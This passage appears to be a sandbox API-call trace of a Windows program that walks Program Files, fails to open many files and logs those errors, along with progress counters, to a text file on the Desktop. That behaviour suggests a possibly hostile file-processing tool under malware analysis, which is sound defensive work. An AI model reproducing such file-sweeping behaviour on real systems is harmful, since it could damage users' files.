Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\n", cchWideChar=3079, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3079 [0207.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\n", cchWideChar=3079, lpMultiByteStr=0x246b7a8, cbMultiByte=3079, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nGzV.Àqvÿ\x8dY\x7f\x1c\\$°9z£-FÄæ?ò¢\x93Ü*¨\x03\x04", lpUsedDefaultChar=0x0) returned 3079 [0207.992] WriteFile (in: hFile=0x2fc, lpBuffer=0x246b7a8*, nNumberOfBytesToWrite=0xc07, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x246b7a8*, lpNumberOfBytesWritten=0x63fe20*=0xc07, lpOverlapped=0x0) returned 1 [0207.993] CloseHandle (hObject=0x2fc) returned 1 [0208.002] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=181 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0208.002] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=181 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe554c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=181 / B=0 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0208.002] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0208.005] Sleep (dwMilliseconds=0x5dc) [0209.560] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0211.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\n", cchWideChar=3596, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3596 [0211.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\n", cchWideChar=3596, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3596 [0211.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\n", cchWideChar=3596, lpMultiByteStr=0x24866c8, cbMultiByte=3596, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nI¶'\x10¬té+\x08L¶\x8dTp\x81Ü\r\x93r£é\x84\x1d\x98\x03\x05", lpUsedDefaultChar=0x0) returned 3596 [0211.717] WriteFile (in: hFile=0x2ac, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0xe0c, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x63fe20*=0xe0c, lpOverlapped=0x0) returned 1 [0211.717] CloseHandle (hObject=0x2ac) returned 1 [0211.739] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=191 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0211.739] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=191 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe531c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=191 / B=0 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0211.739] WriteFile 